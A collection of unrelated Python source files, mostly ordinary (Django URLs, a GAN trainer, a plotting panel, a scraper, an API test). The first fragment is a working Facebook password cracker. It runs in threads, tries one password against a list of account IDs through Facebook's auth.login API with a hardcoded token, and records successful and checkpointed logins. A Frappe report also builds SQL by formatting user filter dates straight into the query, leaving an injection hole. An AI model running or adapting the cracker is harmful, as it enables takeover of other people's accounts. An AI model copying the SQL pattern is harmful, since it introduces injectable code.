nama = dev['name']
print h + ' []' + a + ' Selamat Datang ' + pu + nama + '\x1b[92m :)'
print d + ' ======================================'
password = raw_input(h + ' [' + k + 'MBF' + h + ']' + a + ' Cracking Password' + p + ': ')
if password == '':
print m + ' Jangan Kosong Cuk..'
sys.exit()
if password == ' ':
print m + ' Jangan Kosong Cuk..'
sys.exit()
print
try:
listID = open('id.txt', 'r')
for ival in range(30):
iqbal = threading.Thread(target=iqbaldevmbf, args=())
iqbal.start()
threads.append(iqbal)
for ipal in threads:
ipal.join()
except IOError:
print
print m + ' Tidak Ada File Yang Ditemukan..'
except KeyboardInterrupt:
print
print d + ' Keluar Dari Program'
sys.exit()
except KeyError:
print
print m + ' Terjadi Error Mungkin Akun Kena Cekpoint'
os.system('rm -f token.txt')
print
def iqbaldevmbf():
global baris
global count
global dados1
global gagal
global oradadi
try:
data_lis = open('id.txt', 'r')
baris = data_lis.read().split()
while listID:
user = listID.readline().strip()
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
Iq_data = urllib.urlopen(url)
jsl = json.load(Iq_data)
if count == len(baris):
break
elif 'access_token' in jsl:
dados1.append(h + ' [OK] ' + pu + user + ' | ' + a + password)
count += 1
elif 'www.facebook.com' in jsl['error_msg']:
gagal.append(m + ' [CP] ' + d + user + ' | ' + m + password)
count += 1
else:
oradadi.append(user)
count += 1
sys.stdout.write(pu + '\r [$]' + a + ' Cracking ' + p + str(len(baris)) + pu + ' / ' + p + str(count) + m + ' [ ' + h + str(len(dados1)) + pu + ' / ' + k + str(len(gagal)) + m + ' ]')
sys.stdout.flush()
except IOError:
print
print m + ' Gangguan koneksi..'
def sel():
print
print
for iqbal in dados1:
print iqbal
for dev in gagal:
print dev
print
print m + ' Bosok => ' + str(len(oradadi))
print
logout()
sys.exit()
def main():
login()
mbf()
sel()
if __name__ == '__main__':
main()
|
StarcoderdataPython
|
3397291
|
<gh_stars>1-10
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from .base import *
from .transformer import TransformerPrimitiveBase
__all__ = (u'FeaturizationPrimitiveBase',
u'FeaturizationTransformerPrimitiveBase')
class FeaturizationPrimitiveBase(PrimitiveBase[(Inputs, Outputs, Params)]):
    u"""
    A base class for primitives which transform raw data into a more usable form.

    Use this version for featurizers that allow for fitting (for domain-adaptation, data-specific deep
    learning, etc.). Otherwise use `FeaturizationTransformerPrimitiveBase`.
    """


class FeaturizationTransformerPrimitiveBase(TransformerPrimitiveBase[(Inputs, Outputs)]):
    u"""
    A base class for primitives which transform raw data into a more usable form.

    Use this version for featurizers that do not require or allow any fitting, and simply
    transform data on demand. Otherwise use `FeaturizationPrimitiveBase`.
    """
|
StarcoderdataPython
|
136586
|
<filename>pycws/pycws/urls.py
"""pycws URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from . import views
urlpatterns = [
path('', views.feed, name='feed'),
path('header', views.header, name='header'),
path('admin/', admin.site.urls),
path('api/', include('api.urls')),
path('account/register', views.register, name="register"),
path('account/', include('django.contrib.auth.urls')),
path('articles/', include('articles.urls')),
path('boards/', include('boards.urls')),
path('clans/', include('clans.urls')),
path('langs/', include('languages.urls')),
path('tools/', include('tools.urls')),
path('trans/', include('translations.urls')),
path('profile/', include('users.urls')),
]
|
StarcoderdataPython
|
138000
|
import unittest
from monty.multiprocessing import imap_tqdm
from math import sqrt
class FuncCase(unittest.TestCase):
def test_imap_tqdm(self):
results = imap_tqdm(4, sqrt, range(10000))
self.assertEqual(len(results), 10000)
self.assertEqual(results[0], 0)
self.assertEqual(results[400], 20)
self.assertEqual(results[9999], 99.99499987499375)
results = imap_tqdm(4, sqrt, (i ** 2 for i in range(10000)))
self.assertEqual(len(results), 10000)
self.assertEqual(results[0], 0)
self.assertEqual(results[400], 400)
if __name__ == "__main__":
unittest.main()
|
StarcoderdataPython
|
3310777
|
n = int(input())
for i in range (n, 0, -1):
print (i)
|
StarcoderdataPython
|
3375212
|
# Copyright (c) 2013, Element Labs and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
def execute(filters=None):
sqlq = """select
q2.warehouse,
q1.coins_expected,
q1.coin_count,
q1.error,
q1.no_of_collections,
q2.number,
q1.avg_count from
(
select warehouse,count(name) as number from tabAsset GROUP BY warehouse
)q2
left join
(
select a.site,
SUM(a.coins_expected) as coins_expected,
SUM(b.coin_count) as coin_count,
SUM(b.error) as error,
COUNT(a.machine_number) as no_of_collections,
AVG(b.coin_count) as avg_count
from `tabCollection Entry` a
right join `tabCollection Counting` b
ON a.name = b.collection_entry
where a.creation BETWEEN '{}' AND '{}'
GROUP BY a.site
)q1
ON q1.site = q2.warehouse""".format(filters.from_date,filters.to_date)
columns = [
"Site:Link/Warehouse:200",
"Total Expected Coins:Int:100",
"Total Counted Coins:Int:100",
"Error:Int:100",
"No of Collections:Int:100",
"No of Machines:Int:100",
"AVG Coins per Collection:Float:100"
]
data = frappe.db.sql(sqlq,as_list=1)
return columns, data
|
StarcoderdataPython
|
3229328
|
import os, cv2
import copy
import torch
import torch.nn as nn
import torch.autograd as autograd
import numpy as np
import pandas as pd
import torch.optim as optim
import matplotlib.pyplot as plt
from tqdm import tqdm
from torch.optim.lr_scheduler import CosineAnnealingLR, StepLR
from utils import *
from losses.losses import *
class Trainer():
def __init__(self, loss_type, netD, netG, device, train_dl, lr_D = 0.0002, lr_G = 0.0002, resample = True, weight_clip = None, use_gradient_penalty = False, loss_interval = 50, image_interval = 50, save_img_dir = 'saved_images/'):
self.loss_type, self.device = loss_type, device
self.require_type = get_require_type(self.loss_type)
self.loss = get_gan_loss(self.device, self.loss_type)
self.netD = netD
self.netG = netG
self.train_dl = train_dl
self.lr_D = lr_D
self.lr_G = lr_G
self.train_iteration_per_epoch = len(self.train_dl)
self.device = device
self.resample = resample
self.weight_clip = weight_clip
self.use_gradient_penalty = use_gradient_penalty
self.special = None
self.optimizerD = optim.Adam(self.netD.parameters(), lr = self.lr_D, betas = (0, 0.9))
self.optimizerG = optim.Adam(self.netG.parameters(), lr = self.lr_G, betas = (0, 0.9))
self.real_label = 1
self.fake_label = 0
self.nz = self.netG.nz
self.fixed_noise = generate_noise(49, self.nz, self.device)
self.loss_interval = loss_interval
self.image_interval = image_interval
self.errD_records = []
self.errG_records = []
self.save_cnt = 0
self.save_img_dir = save_img_dir
if(not os.path.exists(self.save_img_dir)):
os.makedirs(self.save_img_dir)
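
    # gradient_penalty() below implements the WGAN-GP regularizer
    # E[(||grad_xhat D(xhat)||_2 - 1)^2], where xhat is a random interpolation
    # between a real and a generated sample; the multiplier applied to this term
    # is the value passed as `use_gradient_penalty` (see train()).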
def gradient_penalty(self, real_image, fake_image):
bs = real_image.size(0)
alpha = torch.FloatTensor(bs, 1, 1, 1).uniform_(0, 1).expand(real_image.size()).to(self.device)
interpolation = alpha * real_image + (1 - alpha) * fake_image
c_xi = self.netD(interpolation)
gradients = autograd.grad(c_xi, interpolation, torch.ones(c_xi.size()).to(self.device),
create_graph = True, retain_graph = True, only_inputs = True)[0]
gradients = gradients.view(bs, -1)
penalty = torch.mean((gradients.norm(2, dim=1) - 1) ** 2)
return penalty
def train(self, num_epoch):
for epoch in range(num_epoch):
for i, data in enumerate(tqdm(self.train_dl)):
self.netD.zero_grad()
real_images = data[0].to(self.device)
bs = real_images.size(0)
noise = generate_noise(bs, self.nz, self.device)
fake_images = self.netG(noise)
c_xr = self.netD(real_images)
c_xr = c_xr.view(-1)
c_xf = self.netD(fake_images.detach())
c_xf = c_xf.view(-1)
if(self.require_type == 0 or self.require_type == 1):
errD = self.loss.d_loss(c_xr, c_xf)
elif(self.require_type == 2):
errD = self.loss.d_loss(c_xr, c_xf, real_images, fake_images)
if(self.use_gradient_penalty != False):
errD += self.use_gradient_penalty * self.gradient_penalty(real_images, fake_images)
errD.backward()
self.optimizerD.step()
if(self.weight_clip != None):
for param in self.netD.parameters():
param.data.clamp_(-self.weight_clip, self.weight_clip)
self.netG.zero_grad()
if(self.resample):
noise = generate_noise(bs, self.nz, self.device)
fake_images = self.netG(noise)
if(self.require_type == 0):
c_xf = self.netD(fake_images)
c_xf = c_xf.view(-1)
errG = self.loss.g_loss(c_xf)
if(self.require_type == 1 or self.require_type == 2):
c_xr = self.netD(real_images)
c_xr = c_xr.view(-1)
c_xf = self.netD(fake_images)
c_xf = c_xf.view(-1)
errG = self.loss.g_loss(c_xr, c_xf)
errG.backward()
self.optimizerG.step()
self.errD_records.append(float(errD))
self.errG_records.append(float(errG))
if(i % self.loss_interval == 0):
print('[%d/%d] [%d/%d] errD : %.4f, errG : %.4f'
%(epoch+1, num_epoch, i+1, self.train_iteration_per_epoch, errD, errG))
if(i % self.image_interval == 0):
if(self.special == None):
sample_images_list = get_sample_images_list('Unsupervised', (self.fixed_noise, self.netG))
plot_img = get_display_samples(sample_images_list, 7, 7)
cur_file_name = os.path.join(self.save_img_dir, str(self.save_cnt)+' : '+str(epoch)+'-'+str(i)+'.jpg')
self.save_cnt += 1
cv2.imwrite(cur_file_name, plot_img)
elif(self.special == 'Wave'):
sample_audios_list = get_sample_images_list('Unsupervised_Audio', (self.fixed_noise, self.netG))
plot_fig = plot_multiple_spectrograms(sample_audios_list, 7, 7, freq = 16000)
cur_file_name = os.path.join(self.save_img_dir, str(self.save_cnt)+' : '+str(epoch)+'-'+str(i)+'.jpg')
self.save_cnt += 1
save_fig(cur_file_name, plot_fig)
plot_fig.clf()
|
StarcoderdataPython
|
3362913
|
<gh_stars>0
from cEnum import eAxes, eRect
from cConstants import cPlotConstants, cPlot2DConstants
import cPlot
import wx
from matplotlib.figure import Figure
from matplotlib.backends.backend_wxagg import FigureCanvasWxAgg as FigureCanvas
class cPlotFrame(cPlot.cPlotFrame):
def __init__(self, iParent, **kwargs):
cPlot.cPlotFrame.__init__(self, iParent, **kwargs)
def initPanel(self, **kwargs):
self.m_PlotPanel = cPlotPanel(self, **kwargs)
class cPlotPanel(cPlot.cPlotPanel):
def __init__(self, iParent, **kwargs):
cPlot.cPlotPanel.__init__(self, iParent, **kwargs)
self.m_NumAxes = 2
self.m_Figure = Figure(figsize=self.getFigSize(),
facecolor=cPlotConstants.m_BackgroundColour, edgecolor=cPlotConstants.m_BackgroundColour)
self.m_Axes = self.m_Figure.add_axes(cPlot2DConstants.m_Rect)
self.m_Axes.set_xlim(self.m_XAxisMin, self.m_XAxisMax)
self.m_Axes.set_ylim(self.m_YAxisMin, self.m_YAxisMax)
'''
# Details of m_Rect, is described in cConstants.cPlot2DConstants
# This will be used for pretty panning, that is, panning the plot and making it look nice
# I will need to calculate the optimal stepping for the pixels
rect = cPlot2DConstants.m_Rect# [0.19, 0.13, 0.8, 0.79]
pixelLength_X_Axis = rect[eRect.fractionOfX] * self.GetSize()[0]
pixelLength_Y_Axis = rect[eRect.fractionOfY] * self.GetSize()[1]
self.m_OptimalXStep = 2.0 / pixelLength_X_Axis
self.m_OptimalYStep = 1.0 / pixelLength_Y_Axis
'''
self.m_Canvas = FigureCanvas(self, -1, self.m_Figure)
# Enables interactivity
self.m_Canvas.mpl_connect("motion_notify_event", self.onMouseMove)
self.m_Canvas.mpl_connect("button_press_event", self.onMousePress)
self.m_Canvas.mpl_connect("button_release_event", self.onMouseRelease)
self.m_Canvas.mpl_connect("key_press_event", self.onKeyPress)
self.m_Canvas.mpl_connect("scroll_event", self.onScroll)
def getFigSize(self):
x, y = self.GetSize()
x = x * cPlot2DConstants.m_FigRatioX
y = y * cPlot2DConstants.m_FigRatioY
return (x, y)
def plotScatter(self, iXData, iYData, iAutoScaling=False, iRedraw=False, iUpdate=True, **kwargs):
if (True == iRedraw):
self.clearAxes()
if (False == iAutoScaling):
tempXAxis = list(self.m_Axes.get_xlim())
tempYAxis = list(self.m_Axes.get_ylim())
self.m_Axes.scatter(iXData, iYData, **kwargs)
self.m_Axes.set_xlim(tempXAxis)
self.m_Axes.set_ylim(tempYAxis)
else:
self.m_Axes.scatter(iXData, iYData, **kwargs)
if (True == iUpdate):
self.redrawAxes()
def resetAxes(self):
self.m_Axes.set_xlim(cPlotConstants.m_DefaultXAxisMin, cPlotConstants.m_DefaultXAxisMax)
        self.m_Axes.set_ylim(cPlotConstants.m_DefaultYAxisMin, cPlotConstants.m_DefaultYAxisMax)
self.updateAxesData()
self.redrawAxes()
def updateAxesData(self):
self.m_XAxisMin, self.m_XAxisMax = self.m_Axes.get_xlim()
self.m_YAxisMin, self.m_YAxisMax = self.m_Axes.get_ylim()
self.m_XAxisLength = (self.m_XAxisMin - self.m_XAxisMax)
self.m_YAxisLength = (self.m_YAxisMin - self.m_YAxisMax)
def onMousePress(self, iEvent):
if (iEvent.inaxes == self.m_Axes):
self.m_PreviousMouseX, self.m_PreviousMouseY = iEvent.xdata, iEvent.ydata
self.m_PreviousMouseXPixel, self.m_PreviousMouseYPixel = iEvent.x, iEvent.y
# modified from mpl.toolkits.mplot3d.axes3d._on_move
def onMouseMove(self, iEvent):
if (not iEvent.button):
return
currentMouseX, currentMouseY = iEvent.xdata, iEvent.ydata
currentMouseXPixel, currentMouseYPixel = iEvent.x, iEvent.y
# In case the mouse is out of bounds.
if (currentMouseX == None):
return
#diffMouseX = (currentMouseX - self.m_PreviousMouseX) * cPlot2DConstants.m_MouseDragSensitivity
#diffMouseY = (currentMouseY - self.m_PreviousMouseY) * cPlot2DConstants.m_MouseDragSensitivity
# panning
# 3 represents right click
if (cPlotConstants.m_MousePanButton == iEvent.button):
self.updateAxesData()
#diffMouseX *= cPlot2DConstants.m_PanSensitivity
#diffMouseY *= cPlot2DConstants.m_PanSensitivity
diffMouseX = currentMouseX - self.m_PreviousMouseX
diffMouseY = currentMouseY - self.m_PreviousMouseY
diffMouseXPixel = currentMouseXPixel - self.m_PreviousMouseXPixel
diffMouseYPixel = currentMouseYPixel - self.m_PreviousMouseYPixel
lengthX = abs(self.m_XAxisMax - self.m_XAxisMin)
lengthY = abs(self.m_YAxisMax - self.m_YAxisMin)
if (False == self.m_LockAxes[eAxes.xAxis]):
if (1 <= abs(diffMouseXPixel)):
shiftedX = diffMouseX * (1 / lengthX)
self.shiftXAxis(-shiftedX)
if (False == self.m_LockAxes[eAxes.yAxis]):
if (1 <= abs(diffMouseYPixel)):
shiftedY = diffMouseY * (1 / lengthY)
self.shiftYAxis(-shiftedY)
self.redrawAxes()
def zoomAxes(self, iZoomAmount):
self.updateAxesData()
diffX = (self.m_XAxisMax - self.m_XAxisMin) * (0.1 * iZoomAmount)
diffY = (self.m_YAxisMax - self.m_YAxisMin) * (0.1 * iZoomAmount)
self.m_Axes.set_xlim(self.m_XAxisMin + diffX, self.m_XAxisMax - diffX)
self.m_Axes.set_ylim(self.m_YAxisMin + diffY, self.m_YAxisMax - diffY)
self.redrawAxes()
def rescaleAxes(self):
# Recompute bounds
self.m_Axes.relim()
self.m_Axes.autoscale_view()
|
StarcoderdataPython
|
101769
|
<reponame>half-cambodian-hacker-man/lustre
#!/usr/bin/env python3
from run_dev import random_secret_key
random_secret_key()
from microblogging import app, DATABASE_URL
from sqlalchemy import create_engine
if __name__ == "__main__":
app.db.metadata.create_all(create_engine(str(DATABASE_URL)))
|
StarcoderdataPython
|
1746506
|
<reponame>ldolin/shixi0
"""
created by ldolin
"""
"""
1.xpath:
解析工具,用来在xml中查找信息的语言,同样适用于HTML文档的检索
2.辅助工具
Chrome插件:xpath helper
启动/关闭:ctrl+shift+x
3.匹配演示
1.查找bookstore下面所有节点:/bookstore
2.查找book下面所有节点://book
3.查找book下面所有title节点lang属性中为"en"的节点
//book/title[@lang="en"]
1.选取节点:
/:从根节点开始选取
//:从整个文档的某个路径开始选取
@:选取某个节点的属性
1.选取1个节点://title[@lang="en"]
2.选取n个节点://title[@lang]
3.选取文本值://title[@lang]/text()
4.匹配多路径:
1.符号:|
比如:
获取所有book下的title和author
//title[@lang]/text()|//author
4.安装HTML/xml解析库
1.安装lxml模块
2.使用
1.利用lxml库中etree模块构建解析对象
2.通过解析对象调用xpath工具定位节点信息
3.
1.导入from lxml import etree
2.创建解析parseHtml = etree.HTML(html)
3.调用xpath解析
r_list = parseHtml.xpath("//title[@lang='en']")
注意:只要调用xpath结果一定是列表
"""
from lxml import etree
import requests
import urllib.request
# import urllib
# //cc/div/img[@class="BDE_Image"]/@src
# //div[@class="threadlist_title pull_left j_th_tit"]/a/@href
# http://dq.tieba.com/p/6176197067
# https://tieba.baidu.com/f?kw=%E5%B0%8F%E5%83%B5%E5%B0%B8&ie=utf-8&pn=50
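
# A minimal sketch of the lxml/xpath flow described in the notes above; the helper
# name and sample HTML are illustrative only and not part of the original script.
def _xpath_demo():
    sample = '<html><body><div class="box"><a href="/p/1">first</a></div></body></html>'
    root = etree.HTML(sample)                          # build the parse tree
    return root.xpath('//div[@class="box"]/a/@href')   # xpath always returns a list: ['/p/1']
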
for i in range(1,7):
# ch = '小僵尸'
# p = (i - 1) * 50
# d1 = {
# 'kw': ch,
# 'pn': p
# }
# d = urllib.parse.urlencode(d1)
url = 'http://tieba.baidu.com/f?kw=%E5%B0%8F%E5%83%B5%E5%B0%B8&pn'+ str((i-1)*50)
headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'
}
# request = urllib.request.Request(url, headers=headers)
# response = urllib.request.urlopen(request)
#
# data = response.read().decode('utf-8')
# ,Content-Type='application/json'; charset='GBK'
response = requests.get(url,headers=headers)
response.encoding = "UTF-8"
# response.encoding = response.apparent_encoding
data1 = response.text
# http://tieba.baidu.com/p/4634297302
# data = data1.replace(r'<!--', '').replace(r'-->', '')
print(data1)
parseHtml = etree.HTML(data1)
# st = '//div[@class="t_con cleafix"]/div/div/div/a[@rel="noreferrer"]/@href'
# st1 = '//div[@class="threadlist_title pull_left j_th_tit "]/a/@href'
r_list1 = parseHtml.xpath('.//*[@class="threadlist_title pull_left j_th_tit"]/a[@rel="noreferrer"]/@href')
print(r_list1)
for j in r_list1:
url1 = 'http://tieba.baidu.com' + j
# request = urllib.request.Request(url, headers=headers)
# response = urllib.request.urlopen(request)
#
# data = response.read().decode('utf-8')
response = requests.get(url1, headers=headers)
response.encoding = "utf-8"
data = response.text
parseHtml = etree.HTML(data)
r_list2 = parseHtml.xpath('//cc/div/img[@class="BDE_Image"]/@src')
for k in r_list2:
response = requests.get(k, headers=headers)
response.encoding = "utf-8"
data = response.content
a = '第'+str(i)+ '页'+'第'+str(len(r_list1))+'个贴'+'第'+str(len(r_list2))+'个图.jpg'
            with open(a, 'wb') as f:
print('正在写入%s' % a)
f.write(data)
print('写入完成。。')
|
StarcoderdataPython
|
3378809
|
# -*- coding: utf-8 -*-
import torch
import numpy as np
import matplotlib.pyplot as plt
import torch.nn as nn
from torch.autograd import Variable
from torch.utils.data import Dataset, DataLoader
import math
from architectures import *
import argparse
from data_to_dict import get_data
from dataset import OurDataset
import os
import re
import shutil
from main import get_data_loader
parser = argparse.ArgumentParser(description='PyTorch Drive a car wohoo')
parser.add_argument('-a','--arch', default='', type=str, metavar='file.class',
help = 'Name of network to use. eg: LucaNetwork.LucaNet')
parser.add_argument('--shuffle', dest='shuffle', action='store_true',
help='Whether to shuffle training data or not. (default: False)')
parser.add_argument('--no-intention', dest='no_intention', action='store_true',
help='Set all intentions to 0. (default: False (aka keep intentions))')
parser.add_argument('-b', '--batch-size', default=16, type=int,
metavar='N', help='mini-batch size (default: 16)')
parser.add_argument('-e', '--epochs', default=10, type=int,
metavar='N', help='number of total epochs (default: 10)')
parser.add_argument('-p','--print-freq', default=100, type=int,
metavar='N', help='print frequency (default: 100)')
parser.add_argument('-pl', '--plot-freq', default=100, type=int,
metavar='N', dest='plot_freq', help='plot frequency (default: 100 batch)')
parser.add_argument('--resume', default='', type=str, metavar='PATH',
help='Name of folder in /media/annaochjacob/crucial/models/ ex \'SmallerNetwork1/checkpoint.pt\' ')
parser.add_argument('--evaluate', dest='evaluate', action='store_true',
help='evaluate model on validation set')
parser.add_argument('--scheduler', dest='scheduler', action='store_true',
help='Whether to manually adjust learning rate as we train. (https://sgugger.github.io/the-1cycle-policy.html)')
parser.add_argument('-d','--dataset', dest='dataset_path', default='',
type=str, metavar='PATH',
help = 'Name of folder in /media/annaochjacob/crucial/dataset/ ex \'Banana_split/\' (with trailing /)')
parser.add_argument('-s','--save-path', dest='save_path', default='',
type=str, metavar='PATH',
help = 'Name of folder in /media/annaochjacob/crucial/models/ ex \'SmallerNetwork1/\' (with trailing /)')
parser.add_argument('-o','--optim', default='SGD(model.parameters(), lr=1e-5, momentum=0.9, nesterov=True)', type=str,
metavar='name(model.parameters(), param**)',
help = 'optimizer and its param. Ex/default: \'SGD(model.parameters(), lr=1e-5, momentum=0.9, nesterov=True)\' )')
parser.add_argument('-pf', '--past-frames', default=0, type=int, dest='past_frames',
metavar='N', help='Number of past lidar frames provided to the network (For RNN it is bptt) (default: 0)')
parser.add_argument('-fs', '--frame-stride', default=1, type=int, dest='frame_stride',
metavar='N', help='Stride of past frames. Ex. past-frames=2 and frames-stride=2 where x is current frame'\
'\n gives x, x-2, x-4. (default: 1)')
parser.add_argument('-mpf','--manual_past_frames', default=None, type=str, metavar='\'1 2 3\'',
help = 'If not use past_frames and frames-stride, list which frames you want manually. Ex: \'1 3 5 7 10 13 16\''\
'NOTE: Not applicable for RNNs!! Use -pf and -fs flags instead.')
parser.add_argument('-bptt', '--bptt', default=1, type=int, dest='bptt',
metavar='N', help='Back propagation through time. Option only available for RNNs. (default = 1)')
# NOTE: Currently we find all rnns by doing regex. If this changes to be true, add this argument.
parser.add_argument('-rnn', '--rnn', dest='rnn', action='store_true',
help='Wheter we have an rnn or not. (not needed if arch str contains \'rnn\')')
parser.add_argument('-bl', '--balance', dest='balance', action='store_true',
help='Balance dataset by sampling with replacement. Not applicable for RNNs. Forces shuffle to True in training set.')
#TODO: data_to_dict, dataset, main.
# save, load,
args = parser.parse_args()
PATH_BASE = '/media/annaochjacob/crucial/'
PATH_RESUME = PATH_BASE + 'models/' + args.resume
PATH_SAVE = PATH_BASE + 'models/' + args.save_path
if not os.path.exists(PATH_SAVE):
os.makedirs(PATH_SAVE)
PATH_DATA = PATH_BASE + 'dataset/' + args.dataset_path
NUM_WORKERS = 3
PIN_MEM = False
if args.manual_past_frames:
args.manual_past_frames = [int(i) for i in args.manual_past_frames.split(' ')]
rnn_arch_match = re.search('RNN', args.arch, flags=re.IGNORECASE)
if rnn_arch_match is not None:
args.rnn = True
def find_lr(net, trn_loader, optimizer, criterion, init_value = 1e-8, final_value=10., beta = 0.98, sampler_max = None):
if sampler_max is not None:
num = int(sampler_max/args.batch_size) + 1
else:
num = len(trn_loader)-1
mult = (final_value / init_value) ** (1/num)
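    # Each batch multiplies lr by `mult`, so the learning rate sweeps
    # geometrically from init_value up to final_value over `num` batches.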
lr = init_value
optimizer.param_groups[0]['lr'] = lr
avg_loss = 0.
best_loss = 0.
batch_num = 0
losses = []
log_lrs = []
print(len(trn_loader))
for batch in trn_loader:
batch_num += 1
#As before, get the loss for this mini-batch of inputs/outputs
lidars = Variable((batch['lidar']).type(torch.cuda.FloatTensor))
values = Variable((batch['value']).type(torch.cuda.FloatTensor))
targets = Variable((batch['output']).type(torch.cuda.FloatTensor))
optimizer.zero_grad()
outputs = net(lidars,values)
loss = criterion(outputs, targets)
#Compute the smoothed loss
avg_loss = beta * avg_loss + (1-beta) *loss.data[0]
smoothed_loss = avg_loss / (1 - beta**batch_num)
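        # avg_loss is an exponential moving average of the raw loss; dividing by
        # (1 - beta**batch_num) applies the usual bias correction for early batches.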
#Stop if the loss is exploding
if batch_num > 1 and smoothed_loss > 1000 * best_loss:
return log_lrs, losses
#Record the best loss
if smoothed_loss < best_loss or batch_num==1:
best_loss = smoothed_loss
#Store the values
losses.append(smoothed_loss)
log_lrs.append(math.log10(lr))
#Do the SGD step
loss.backward()
optimizer.step()
#Update the lr for the next step
lr *= mult
optimizer.param_groups[0]['lr'] = lr
if batch_num % 10 == 0:
print('Batch: %i \tLoss: %.3f \tlr: %.3e' %(batch_num,smoothed_loss,lr))
return log_lrs, losses
def main():
#write info file
if not os.path.exists(PATH_SAVE):
os.makedirs(PATH_SAVE)
write_info_file()
for i in range(1):
model = eval(args.arch + "()")
model.cuda()
if not args.rnn:
sampler_max = 100000
else:
sampler_max = None
trn_loader = get_data_loader(PATH_DATA + 'train/', shuffle=args.shuffle, balance=args.balance, sampler_max = sampler_max)
optimizer = eval('torch.optim.' + args.optim)
criterion = torch.nn.MSELoss().cuda()
log_lrs, losses = find_lr(model, trn_loader, optimizer, criterion, sampler_max = sampler_max)
plt.plot(log_lrs,losses)
#plt.show()
plt.savefig(PATH_SAVE + 'lr_finder.png')
write_loss_file(log_lrs, losses)
def write_loss_file(log_lrs, losses):
np.savetxt(PATH_SAVE + "log_lrs.txt", log_lrs, comments='', delimiter=',',fmt='%.8f')
np.savetxt(PATH_SAVE + "losses.txt", losses, comments='', delimiter=',',fmt='%.8f')
def write_info_file():
info = ""
for key in args.__dict__:
info += str(key) + " : " + str(args.__dict__[key]) + "\n"
file = open(PATH_SAVE + "info.txt", "w")
file.write(info)
file.close()
if __name__ == '__main__':
main()
|
StarcoderdataPython
|
163883
|
<gh_stars>0
from django.db.models import Model
|
StarcoderdataPython
|
94601
|
"""URL Configuration"""
from django.urls import path, include
from . import views
from rest_auth.views import LogoutView
urlpatterns = [
path('user/', views.UserDetailsAPIView.as_view(), name='rest_user_details'),
path('login/', views.LoginUserView.as_view(), name='account_login'),
path('password/change/', views.PasswordUserChangeView.as_view(), name='rest_password_change'),
path('password/reset/', views.PasswordResetUserView.as_view(), name='rest_password_reset'),
path('', include('rest_auth.urls')),
path('registration/', views.RegisterUserView.as_view(), name='account_signup'),
path('rest-auth/registration/', include('rest_auth.registration.urls')),
path('account-confirm-email/<str:key>/', views.VerifyUserEmailView.as_view(), name='account_confirm_email'),
path('password/reset/confirm/<str:uid>/<str:token>/', views.PasswordResetConfirmUserView.as_view(), name='rest_password_reset_confirm'),
path('logout/', LogoutView.as_view(), name='rest_logout'),
]
|
StarcoderdataPython
|
1722088
|
<reponame>hxhxhx88/futuquant
#-*-coding:utf-8-*-
from futuquant import *
import pandas
class ALLApi(object):
    # Pre-release test cases: walk through every interface to make sure it runs
def __init__(self):
pandas.set_option('max_columns',100)
pandas.set_option('display.width',1000)
self.host = '127.0.0.1'
self.port = 11111
self.subTypes = [SubType.QUOTE, SubType.ORDER_BOOK, SubType.BROKER, SubType.TICKER, SubType.RT_DATA, SubType.K_1M,
SubType.K_5M, SubType.K_15M, SubType.K_30M, SubType.K_60M, SubType.K_DAY, SubType.K_WEEK,
SubType.K_MON]
def test_quotation(self):
        # All synchronous quotation (market data) interfaces
quote_ctx = OpenQuoteContext(self.host, self.port)
print('获取报价 get_stock_quote')
print(quote_ctx.get_stock_quote(code_list = ['HK.00700','HK.62423','HK.800000','US.AAPL','SH.601318','SH.000001','SZ.000001']))
print('获取逐笔 get_rt_ticker')
print(quote_ctx.get_rt_ticker(code= 'HK.00388',num=1000))
print(quote_ctx.get_rt_ticker(code='US.MSFT', num=1000))
print(quote_ctx.get_rt_ticker(code='SH.601998', num=1000))
print('获取实时K线 get_cur_kline')
print(quote_ctx.get_cur_kline(code = 'HK.00772', num=1000, ktype=SubType.K_5M, autype=AuType.QFQ))
print(quote_ctx.get_cur_kline(code='US.FB', num=500, ktype=SubType.K_DAY, autype=AuType.HFQ))
print(quote_ctx.get_cur_kline(code='SZ.000885', num=750, ktype=SubType.K_WEEK, autype=AuType.NONE))
print('获取摆盘 get_order_book')
print(quote_ctx.get_order_book(code = 'HK.01810'))
print(quote_ctx.get_order_book(code='US.AMZN'))
print('获取分时数据 get_rt_data')
print(quote_ctx.get_rt_data(code = 'HK.01357'))
print(quote_ctx.get_rt_data(code='US.MDR'))
print(quote_ctx.get_rt_data(code='SZ.000565'))
print('获取经纪队列 get_broker_queue')
print(quote_ctx.get_broker_queue(code = 'HK.01478'))
print('订阅 subscribe')
print(quote_ctx.subscribe(code_list = ['HK.00700','US.AAPL'], subtype_list =self.subTypes))
print('查询订阅 query_subscription')
print(quote_ctx.query_subscription(is_all_conn=True))
print('获取交易日 get_trading_days')
print(quote_ctx.get_trading_days(market = Market.HK, start_date=None, end_date=None))
print('获取股票信息 get_stock_basicinfo')
print(quote_ctx.get_stock_basicinfo(market = Market.HK, stock_type=SecurityType.STOCK, code_list=None))
print(quote_ctx.get_stock_basicinfo(market=Market.HK, stock_type=SecurityType.WARRANT, code_list=None))
print(quote_ctx.get_stock_basicinfo(market=Market.US, stock_type=SecurityType.STOCK, code_list=None))
print('获取复权因子 get_autype_list')
print(quote_ctx.get_autype_list(code_list = ['HK.00700','US.AAPL','SZ.300104']))
print('获取市场快照 get_market_snapshot')
print(quote_ctx.get_market_snapshot(code_list = ['HK.00700','US.AAPL','SZ.300104']))
print('获取板块集合下的子板块列表 get_plate_list')
print(quote_ctx.get_plate_list( market = Market.HK, plate_class = Plate.ALL))
print(quote_ctx.get_plate_list(market=Market.US, plate_class=Plate.ALL))
